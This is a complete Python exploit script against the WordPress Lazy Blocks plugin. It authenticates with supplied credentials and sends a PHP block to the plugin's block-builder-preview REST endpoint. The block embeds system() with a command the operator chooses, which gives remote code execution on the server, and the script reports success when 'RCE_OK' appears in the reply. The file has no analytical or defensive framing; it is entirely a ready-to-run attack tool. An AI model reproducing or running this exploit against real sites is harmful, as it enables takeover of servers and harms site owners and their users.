import requests
import base64
import json
import sys

if len(sys.argv) != 5:
    print(f"[!] Usage: {sys.argv[0]} <target_url> <username> <password> <command>")
    sys.exit(1)

TARGET = sys.argv[1].rstrip("/")
USERNAME = sys.argv[2]
PASSWORD = sys.argv[3]
COMMAND  = sys.argv[4]

endpoint = f"{TARGET}/wp-json/lazy-blocks/v1/block-builder-preview/"

auth = base64.b64encode(f"{USERNAME}:{PASSWORD}".encode()).decode()

headers = {
    "Authorization": f"Basic {auth}",
    "Content-Type": "application/json"
}

payload = {
    "context": "editor",
    "block": {
        "slug": "exploit",
        "code_output_method": "php",
        "code_editor_html": f"<?php echo 'RCE_OK:'; system('{COMMAND}'); ?>"
    }
}

try:
    r = requests.post(endpoint, headers=headers, data=json.dumps(payload), timeout=10)

    if r.status_code == 200 and "RCE_OK" in r.text:
        print("[+] Exploit successful")
        print(r.text)
    else:
        print("[-] Exploit failed")
        print("Status:", r.status_code)
        print(r.text)

except requests.exceptions.RequestException as e:
    print("[-] Request error:", e)